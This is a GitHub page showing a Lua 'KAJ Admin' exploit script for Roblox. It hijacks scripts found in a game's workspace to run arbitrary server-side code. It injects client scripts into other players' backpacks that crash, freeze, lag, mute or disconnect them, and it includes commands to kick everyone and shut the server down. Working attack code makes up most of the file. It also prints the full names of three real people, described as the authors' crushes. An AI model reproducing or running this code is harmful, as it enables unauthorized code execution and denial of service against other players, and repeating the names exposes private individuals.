forked from retpirato/Roblox-Scripts
-
Notifications
You must be signed in to change notification settings - Fork 0
/
(Rarest[OTHER{LOCAL}]Kaj Gen 4.lua
1733 lines (1609 loc) · 45.5 KB
/
(Rarest[OTHER{LOCAL}]Kaj Gen 4.lua
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
--__(KAJ Admin Generation Four)__--
wait()
LocalPlayer = game:service("Players").LocalPlayer
script.Parent = _Kaley_Alison_Jacquelyn_
Tabs = {}
Cmds = {}
key = "/"
chatgui = false
probemode = false
connection = nil
selection = false
Bypass = fals
XAdminsAdmin = "KajAdminG2"
XAdminsAdminPlayer = game:GetService("Players"):findFirstChild(XAdminsAdmin)
XAdmin = {
AdminsSoundAdminMusic = {
AdminMusic = {
{ID = "http://www.roblox.com/Asset/?id=144364636",PITCH = 1,NAME = "Hey brother"};
{ID = "http://www.roblox.com/Asset/?id=142720946",PITCH = 1,NAME = "Tsunami Hardstyle"};
{ID = "http://www.roblox.com/Asset/?id=133517131",PITCH = 1,NAME = "Swordland"};
{ID = "http://www.roblox.com/Asset/?id=155183751",PITCH = 1,NAME = "Crossing Fields"};
{ID = "http://www.roblox.com/Asset/?id=155319906",PITCH = 1,NAME = "Problem"};
{ID = "http://www.roblox.com/Asset/?id=155104467",PITCH = 1,NAME = "Take Me Home"};
{ID = "http://www.roblox.com/Asset/?id=142276301",PITCH = 1,NAME = "Overtime"};
{ID = "http://www.roblox.com/Asset/?id=142516045",PITCH = 1,NAME = "Orchestra"};
{ID = "http://www.roblox.com/Asset/?id=142518226",PITCH = 1,NAME = "X files"};
{ID = "http://www.roblox.com/Asset/?id=143545724",PITCH = 1,NAME = "Ghost"};
{ID = "http://www.roblox.com/Asset/?id=156650736",PITCH = 1,NAME = "trapped"};
{ID = "http://www.roblox.com/Asset/?id=131243684",PITCH = 1,NAME = "Chillstep"};
{ID = "http://www.roblox.com/Asset/?id=154199055",PITCH = 1,NAME = "What About Love"};
{ID = "http://www.roblox.com/Asset/?id=152020611",PITCH = 1,NAME = "Rich Girl"};
{ID = "http://www.roblox.com/Asset/?id=145411653",PITCH = 1,NAME = "What does the fox say?"};
{ID = "http://www.roblox.com/Asset/?id=154604668",PITCH = 1,NAME = "I Like It Loud"};
{ID = "http://www.roblox.com/Asset/?id=158643393",PITCH = 1,NAME = "[i made this audio] Alive(Cash Cash x DJ Kalkutta Remix) Part 1"};
{ID = "http://www.roblox.com/Asset/?id=158643635",PITCH = 1,NAME = "[i made this audio] Alive(Cash Cash x DJ Kalkutta Remix) Part 2"};
{ID = "http://www.roblox.com/Asset/?id=149881491",PITCH = 1,NAME = "Addicted to you"};
{ID = "http://www.roblox.com/Asset/?id=110735379",PITCH = 1,NAME = "Movement Proposition 2"};
{ID = "http://www.roblox.com/Asset/?id=45819151",PITCH = 1,NAME = "Temple Of The Ninja Masters"};
{ID = "http://www.roblox.com/Asset/?id=144105373",PITCH = 1,NAME = "What My Cutie Mark Is Telling Me"};
{ID = "http://www.roblox.com/Asset/?id=144468928",PITCH = 3,NAME = "wat the stopid"};
{ID = "http://www.roblox.com/Asset/?id=152940771",PITCH = 1,NAME = "This is what if feels LIKE"};
{ID = "http://www.roblox.com/Asset/?id=144658116",PITCH = 1,NAME = "Fifth harmony"};
{ID = "http://www.roblox.com/Asset/?id=148952593",PITCH = 1,NAME = "Talk dirty to me"};
{ID = "http://www.roblox.com/Asset/?id=148321914",PITCH = 1,NAME = "Selfie"};
{ID = "http://www.roblox.com/Asset/?id=130872377",PITCH = 1,NAME = "Narwhals"};
{ID = "http://www.roblox.com/Asset/?id=142492972",PITCH = 1,NAME = "Overfly"};
{ID = "http://www.roblox.com/Asset/?id=149811427",PITCH = 1,NAME = "mmm"};
};
};
};
tabmodel = Instance.new("Model", Workspace)
tabmodel.Name = "KAJ Admin"
SourceName = "DSource"
Banlist = {"nolanhawz1","MUSHR0OM","ServerGuardianAdmin","SeverGuardianAdmin","Edward6789","willowtree1118","tyresias","davenlaw","NilScripter","iKrypto"}
BSoDBanList = {"MUSHR0OM","ServerGuardianAdmin","SeverGuardianAdmin","Edward6789","willowtree1118","tyresias","davenlaw","NilScripter","iKrypto"}
function Connect(player)
if game.Players[player] then
if not Players[player.Name] then
NewLS(CrashSource,player.Backpack)
table.insert(Players,player.Name)
Output('Entered > '..player.Name,__)
end
end
end
function Crash(name)
name = tostring(name or "nil")
local t = Instance.new("StringValue")
t.Name = "DISC: "..name
t.Parent = game.Lighting
game:GetService("Debris"):AddItem(t,1)
end
ConnectSource = [=[
wait()
script:ClearAllChildren()
wait()
script.Parent = nil
wait()
Player = game:service'Players'.LocalPlayer
wait()
while wait(0.1) do --this is actually the nilcrash
if game.Lighting:findFirstChild("DISC: nil") then
if Player.Parent == nil then
repeat Delay(0, wait) until false
end
end
if game.Lighting:findFirstChild("DISC: "..Player.Name) then
repeat Delay(0, wait) until false
end
if game.Lighting:findFirstChild("DISC: all") then
repeat Delay(0, wait) until false
end
end
]=]
DLSource = [==[
game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
wait(0)
script.Parent = nil
plr = game:GetService("Players").LocalPlayer
local plrgui = plr:findFirstChild("PlayerGui")
if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
while plr.Parent == game:GetService("Players") do
wait()
for i = 1, 100000 do
local sc = Instance.new("ScreenGui",plrgui)
local fr = Instance.new("TextLabel",sc)
fr.Text = "DL'D BY KAJ"
fr.Size = UDim2.new(1, 0, 1, 0)
fr.FontSize = "Size48"
end
end
]==]
LagSource = [[
wait()
script.Parent = game:service'TeleportService'
CC = workspace.CurrentCamera
game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
RS = game:service("RunService")
PG = game.Players.LocalPlayer.PlayerGui
C = game.Players.LocalPlayer.Character
function Lag()
coroutine.resume(coroutine.create(function()
while wait() do
M = Instance.new("Message",CC)
M.Text = tick()*math.floor(5%4*21)
H = Instance.new("Hint",CC)
H.Text = 'Super lagged'
SG=Instance.new("ScreenGui",PG)
FR=Instance.new("Frame",SG)
FR.Size = UDim2.new(500,500,500,500)
while wait() do
FR.BackgroundColor3 = Color3.new(math.random(0,255),math.random(0,255),math.random(0,255))
end
P=Instance.new("Part",CC)
E=Instance.new("Explosion",P)
E.BlastRadius=math.huge
E.Position=P.Position
F=Instance.new("Fire",P)
S=Instance.new("Smoke",P)
P.CFrame = CC.Focus
P.Anchored = true
P.CanCollide = false
P.AncestryChanged:connect(function()Lag()end)
for _,v in pairs(C:GetChildren()) do pcall(function()v.Anchored=true end) end
end
end))
end
RS.Stepped:connect(function()for i=1,10000 do Lag()Lag()Lag()end end)
]]
coroutine.resume(coroutine.create(function()
while wait(3) do
if game:GetService("Players").Name ~= "Players" then
game:GetService("Players").Name = "Players"
end
end
end))
function Dismiss()
for i = 1, 10 do
for i = 1, #Tabs do
table.remove(Tabs, i)
if tabmodel then
tabmodel:ClearAllChildren()
end end end
end
function AddCmd(Name,Say,Desc,Func)
table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func})
end
found = false
coroutine.wrap(function()
while found == false do
if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
for _,scriptinworkspace in pairs(workspace:children()) do
if scriptinworkspace then
if scriptinworkspace:IsA("Script") then
if scriptinworkspace:FindFirstChild(SourceName) then
newScript = scriptinworkspace:Clone()
wait(0.2)
newScript.Name = "NewScript"
newScript.Disabled = true
newScript:FindFirstChild(SourceName).Value = ""
Output("Source found", __)
found = true
break
end
end
end
end
wait()
end
end)()
AddCmd("Unpunish player","unpunish","Restore the player's character",
function(plrs)
for _, plr in pairs(plrs) do
if plr then
NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
end
end
end
)
function NewS(sourcevalue, parent)
if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
NS(sourcevalue, parent)
else
if newScript then
local scr = newScript:Clone()
if scr:FindFirstChild(SourceName) then
if scr:FindFirstChild(SourceName) then
scr:FindFirstChild(SourceName).Value = sourcevalue
scr.Parent = parent
wait(0.5)
scr.Disabled = false
return scr
end
end
end
end
end
sorcery = script:Clone()
Services = {
game:GetService("Workspace"),
game:GetService("Players"),
game:GetService("Lighting"),
game:GetService("StarterPack"),
game:GetService("StarterGui"),
game:GetService("Teams"),
game:GetService("SoundService"),
game:GetService("Debris"),
game:GetService("InsertService"),
game:GetService("RunService"),
game:GetService("Chat"),
game:GetService("TeleportService"),
game:GetService("Geometry"),
game:GetService("MarketplaceService"),
game:GetService("BadgeService"),
game:GetService("NetworkClient"),
game:GetService("FriendService"),
}
function Explore(Item)
Dismiss()
if(Item==nil)then
for _,v in pairs(Services)do
Output(v.Name,function() Explore(v) end)
end;
else
f={
['View children']=function()
Dismiss()
for _,v in pairs(Item:children())do
Output(v.Name,function()
Explore(v)
wait()
end);
end;
end;
['View parent']=function()
Explore(Item.Parent)
end;
['Destroy']=function()
Item:Destroy();
Explore(Item.Parent);
end;
['Clear']=function()
Item:ClearAllChildren()
end;
['Clone']=function()
pcall(function()
cloneableObj = Item:clone()
end)
end;
['Remove']=function()
Item:remove()
end;
['Paste']=function()
if cloneableObj then
cloneableObj.Parent = Item
end
end;
['Ki'..'ck Item']=function()
NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
end;
};
for i,v in pairs(f)do
Output(tostring(i),v);
end;
Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
if cloneableObj then
Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
end
end;
end;
AddCmd("Explore","explore","Explore the game",
function()
Explore()
end
)
function NewLS(sourcevalue, parent)
if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
NLS(sourcevalue, parent)
else
local NS = sorcery:Clone()
NS.Name = "NewLocal"
local Source = NS:findFirstChild(SourceName)
if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
Source.Value = sourcevalue
NS.Parent = parent
NS.Disabled = false
return NS
end
end
Clothes = {}
for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
table.insert(Clothes,Item:Clone())
end
end
for i,v in pairs(LocalPlayer.Character:GetChildren()) do
if v:IsA("BodyColors") then
body = v
torsocolor = body.TorsoColor
leftlegcolor = body.LeftLegColor
rightlegcolor = body.RightLegColor
leftarmcolor = body.LeftArmColor
rightarmcolor = body.RightArmColor
headcolor = body.HeadColor
end
end
mouse = LocalPlayer:GetMouse()
mouse.KeyDown:connect(function(key)
if key == "q" then
game:service'StarterGui':SetCoreGuiEnabled(4, true)
end
end)
AddCmd("Chat","chat","Turn you chat on/off",
function(plrs, msg)
if msg == "off" then
chatgui = false
elseif msg == "on" then
chatgui = true
end
end
)
AddCmd("Set speed","ws","Sets the Speed of a player",
function(plrs, msg)
local keypos = msg:find(key)
local targPlayers = msg:sub(1,keypos-1)
local plrs = getPlayers(targPlayers)
local speed = msg:sub(tonumber(keypos+1))
for _,v in pairs(plrs) do
if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
v.Character:findFirstChild("Humanoid").WalkSpeed = speed
end
end
end
)
Bad_Char = ""
AddCmd("Commands","cmds","Show the commands",
function()
Dismiss()
for i, v in pairs(Cmds) do
Output(v["Name"],
function()
Output("Description: "..v["Desc"], __)
Output("Usage: "..v["Say"], __)
Output("Name: "..v["Name"], __)
end)
end
end
)
AddCmd("Rejoin player","rej","Rejoin the player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Backpack then
NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
end
end
end
)
AddCmd("Clean workspace","clean","Clean the workspace",
function()
for a,b in pairs(game.Workspace:GetChildren()) do
if not game.Players:GetPlayerFromCharacter(b) and b.Name ~= 'Base' and b.Name ~= 'Camera' then
pcall(function() b:Destroy() end)
end
end
if game.Workspace:findFirstChild('Base') == nil then
local Base = Instance.new("Part",Game.Workspace)
Base.Name = "Base"
Base.Anchored = true
Base.Locked = true
Base.BrickColor = BrickColor.new("Bright green")
Base.Size = Vector3.new(2048,2,2048)
Base.CFrame = CFrame.new(0,0,0)
end
Output("You have cleaned workspace!")
end
)
AddCmd("Execute", "exe","Execute a a Script",
function(plrs, msg)
a,b = ypcall(function()
loadstring(msg)()
end) if not a then Output(b,"Bright red") end
end
)
AddCmd("Anchored", "anchor","Anchor all parts",
function()
g = game.Workspace:GetChildren () do
for i = 1, #g do
if g[i].ClassName == "Part" then
g[i].Anchored = true else if
g[i].ClassName == "Model" then
y = g[i]:GetChildren ()
for i = 1, #y do
if y[i].ClassName == "Part" then
y[i].Anchored = true
end
end
end
end
end
end
end
)
AddCmd("Unanchor", "unanchor","unanchor all parts",
function()
g = game.Workspace:GetChildren () do
for i = 1, #g do
if g[i].ClassName == "Part" then
g[i].Anchored = false else if
g[i].ClassName == "Model" then
y = g[i]:GetChildren ()
for i = 1, #y do
if y[i].ClassName == "Part" then
y[i].Anchored = false
end
end
end
end
end
end
end
)
AddCmd("Give KAJ Admin to a player","kaj","Give KAJ Admin to a player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Backpack then
script.Parent = plr.Backpack
Output("You gave admin to: "..plr.Name, __)
end
end
end
)
AddCmd("Script Info","sinfo","Shows the info of the Script",
function()
Output("Buyable:No")
Output("Script name: KAJ Admin")
Output("Creators are: Cobalt1164, KajAdmin")
Output("The name is based on my 3 crushes, Kaley Franzwa, Alison Agular, and Jacquelyn Mollenhoff")
Output("If you have a request, message the creators.")
Output("Generation 4")
Output("Version 4.1")
end
)
AddCmd("Away from Keyboard","afk","Your afk",
function()
Dismiss()
for i = 1,4 do
wait()
Output("i'm afk go away")
end
end
)
AddCmd("Test if KAJ Admin is still Working","a","Test!!!",
function()
Dismiss()
for i = 1,4 do
wait()
Output("KAJ Admin is working")
end
end
)
AddCmd("Back","back","Your back",
function()
Dismiss()
for i = 1,4 do
wait()
Output("im back!!")
end
wait(3)
Dismiss()
end
)
AddCmd("Ban a player","ban","Kicks a player when he enters",
function(plrs, msg)
for _,v in pairs(plrs) do
if v then
table.insert(Banlist,v.Name)
Output('Banned > '..v.Name,__)
else
Output(Error)
end
end
end
)
AddCmd("Lighting Fix","fixl","Lighting fix",
function()
function dtr()
local sk = game.Lighting:findFirstChild("Sky")
if sk ~= nil then
sk:Remove()
end
game.Lighting.FogEnd = 10011111111
game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
game.Lighting.TimeOfDay = "14:00:00"
game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
game.Lighting.Brightness = 1
game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
game.Lighting.ColorShift_Top = Color3.new(0,0,0)
game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
end
dtr()
game.Lighting.Changed:connect(dtr)
end
)
AddCmd("Cobalt Sky","cs","Set the skybox to ME",
function()
sky = Instance.new("Sky")
sky.Parent = game.Lighting
sky.SkyboxBk = "http://www.roblox.com/asset/?id=159514018"
sky.SkyboxDn = "http://www.roblox.com/asset/?id=159514018"
sky.SkyboxFt = "http://www.roblox.com/asset/?id=159514018"
sky.SkyboxLf = "http://www.roblox.com/asset/?id=159514018"
sky.SkyboxRt = "http://www.roblox.com/asset/?id=159514018"
sky.SkyboxUp = "http://www.roblox.com/asset/?id=159514018"
end
)
AddCmd("Shutdown","sd","Shuts the server down",
function()
wait(1)
for _,v in pairs(game.Players:GetPlayers()) do v:Kick() end
end
)
AddCmd("Respawn","respawn","Respawn player",
function(plrs)
for _,plr in pairs(plrs) do
if plr then
NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
end
end
end
)
AddCmd("Connect","connect","Connect a player",
function(plrs)
for _,plr in pairs(plrs) do
if plr and plr.Backpack then
Connect(plr)
end
end
end
)
AddCmd("Hello!","helh","SPAM HELLO AND HI!11",
function()
while true do wait() Output("Hello") Output("Hi")
end end
)
AddCmd("Night","night","Makes it night",
function()
game.Lighting.TimeOfDay = "00:00:00"
end
)
AddCmd("Kick player list","klist", "Show a kick player list",
function()
Dismiss()
Output("Players to kick", __)
for _,v in pairs(game:GetService("Players"):GetChildren()) do
Output(v.Name,
function()
NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack)
v:Destroy()
end)
end
end
)
AddCmd("Day","day","Makes it day",
function()
game.Lighting.TimeOfDay = "12:00:00"
end
)
AddCmd("Disconnect","dc","DC'S a player",
function(plrs)
for _,plr in pairs(plrs) do
if plr and plr.Backpack then
NewLS([[local lp = game.Players.LocalPlayer;lp.Parent = nil;wait();lp.Parent = game.Players]],plr.Backpack)
end
end
end)
AddCmd("Script local","ls","LocalScript",
function(nothing, msg)
if LocalPlayer.Parent ~= nil then
NewLS(msg, LocalPlayer.Backpack)
end
end
)
AddCmd("Playerinfo","pinfo","Get info on someone",
function(plrs)
for _,plr in pairs(plrs) do
if plr then
Output("Age: "..plr.AccountAge,"noncolar")
Output("Membership: "..plr.MembershipType.Name,"Hot pink")
Output("Player: "..plr.Name,"Royal purple")
Output("Id: "..plr.userId,"New Yeller")
Output("Camera Mode: "..plr.CameraMode.Name,"Dark green")
end
end
end)
AddCmd("Force shutdown","fsd","Forces shutdown",
function(nothing, msg)
NewS([[local b = Instance.new ("ManualSurfaceJointInstance",Workspace)]],workspace)
end
)
AddCmd("Create base","base","Create the base",
function()
a = Instance.new("Part")
a.Parent = Workspace
a.Name = "Base"
a.Position = Vector3.new(0, 0.6, 0)
a.Size = Vector3.new(1002, 0, 1002)
a.Material = "Grass"
a.Anchored = true
a.BrickColor = BrickColor.new("Dark green")
end
)
AddCmd("Ping","ping","Ping something",
function(plrs, msg)
if msg == "" then
Output("pong", __)
else
Output(msg, __)
end
end
)
AddCmd("Dismiss","dt","Dismiss tabs",
function()
Dismiss()
end
)
AddCmd("God player","god","God a player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Character and plr.Character.Humanoid then
me = plr
me.Character.Humanoid.MaxHealth=math.huge
end
end
end
)
AddCmd("DL","dl","DL a player",
function(Plrs)
for _, plr in pairs(Plrs) do
if plr and plr.Backpack then
for i = 0,7,1 do
NewLS(DLSource, plr.Backpack)
Output("You DL'D "..plr.Name, __)
end
end
end
end
)
AddCmd("Nilp","nils","Shows nil",
function()
NewS([[
Model = Instance.new("Model", game.Lighting)
Model.Name = "V3rm Tabs"
for _,v in pairs(game:service'NetworkServer':children()) do
if v:GetPlayer() then
if v:GetPlayer().Parent ~= game:service'Players' then
Instance.new("StringValue",Model).Value = v:GetPlayer().Name
end
end
end
]], workspace)
wait()
np = nil
for i = 0,5,1 do
if game.Lighting:findFirstChild("V3rm Tabs") then
np = game.Lighting:findFirstChild("V3rm Tabs")
break
end
wait(0.1)
end
if np ~= nil then
Dismiss()
for _,v in pairs(np:children()) do
if v:IsA("StringValue") then
Output(v.Value,"Royal purple")
end
end
elseif np == nil then
Output("Something broke","Royal purple")
end
end
)
AddCmd("reload","char","Makes your character",
function()
if workspace.CurrentCamera == nil then return end
local camera = workspace.CurrentCamera
local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
local human = new_char.Humanoid
human.Parent = nil
new_char.Name = LocalPlayer.Name
wait()
human.Parent = new_char
camera.CameraSubject = human
camera.CameraType = "Custom"
new_char.Parent = workspace
LocalPlayer.Character = new_char
new_char:MakeJoints()
new_char.Torso.BrickColor = torsocolor
new_char["Left Leg"].BrickColor = leftlegcolor
new_char["Right Leg"].BrickColor = rightlegcolor
new_char["Left Arm"].BrickColor = leftarmcolor
new_char["Right Arm"].BrickColor = rightarmcolor
new_char.Head.BrickColor = headcolor
for i,v in pairs(Clothes) do
v:Clone().Parent = new_char
end
probemode = false
end
)
AddCmd("Remove KAJ Admin","kajr","Remove KAJ Admin",
function()
Output("Remove KAJ Admin?",
function()
for i,v in pairs(getfenv(1)) do
getfenv(1)[i] = nil
end
script.Disabled = true
LocalPlayer = NO_PLAYER
script:findFirstChild(SourceName).Value = " "
script.Disabled = true
tabmodel:ClearAllChildren()
tabmodel:Destroy()
connection:disconnect()
Tabs = {}
Cmds = {}
Banlist = {}
fh.all = true
coroutine.resume(coroutine.create(function()
while wait(0.1) do
Dismiss()
end
end))
end)
end
)
AddCmd("ForceField","ff","Give a forcefield to player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Character then
Instance.new("ForceField", plr.Character)
end
end
end
)
AddCmd("Super FF","sff","Give 6000 forcefields to a player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Character then
for i = 1,6000 do
Instance.new("ForceField", plr.Character)
end
end
end
end
)
function ShowBL()
Dismiss()
for _,v in pairs(Banlist) do
Output(v, "Royal purple", function()
Dismiss()
Output("Un-ban", "Black", function() table.remove(Banlist,_) end)
Output("Back", "Royal purple", function() ShowBL() end)
end)
end
end
AddCmd("Banlist","bl","Show banned players",
function()
ShowBL()
end
)
AddCmd("C-FF","cff","Puts as much as ff's as there are commands",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Character then
for i = 1,#Cmds do
Instance.new("ForceField",plr.Character)
end
end
end
end
)
AddCmd("Lag player","lag","Lag a player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Backpack then
NewLS(LagSource, plr.Backpack)
end
end
end
)
AddCmd("Scythe","scy","Give someone scythe script",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Backpack then
NewLS(ScytheSource, plr.Backpack)
end
end
end
)
AddCmd("Normal Crash","ncr","Normal crash a player",
function(Plrs)
for _,plr in pairs(Plrs) do
if plr and plr.Backpack then
NewLS("repeat until false",plr.Backpack)
end
end
end
)
AddCmd("Crash player","crash","Crash a player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Backpack then
NewLS("while true do end", plr.Backpack)
end
end
end
)
AddCmd("Kill player","kill","Kill a player",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Character then
plr.Character:BreakJoints()
end
end
end
)
AddCmd("Mute player","mute","Removes a players chatbar",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Backpack then
NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
end
end
end
)
AddCmd("Unmute player","unmute","Creates a players chatbar when removed",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Backpack then
NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
end
end
end
)
AddCmd("Un-ForceField","unff","Remove the forcefield of someone",
function(plrs)
for _, plr in pairs(plrs) do
if plr and plr.Character then
pcall(function()
for _,v in pairs(plr.Character:GetChildren()) do
if v:IsA("ForceField") then
v:Destroy()
end
end
end)
end
end
end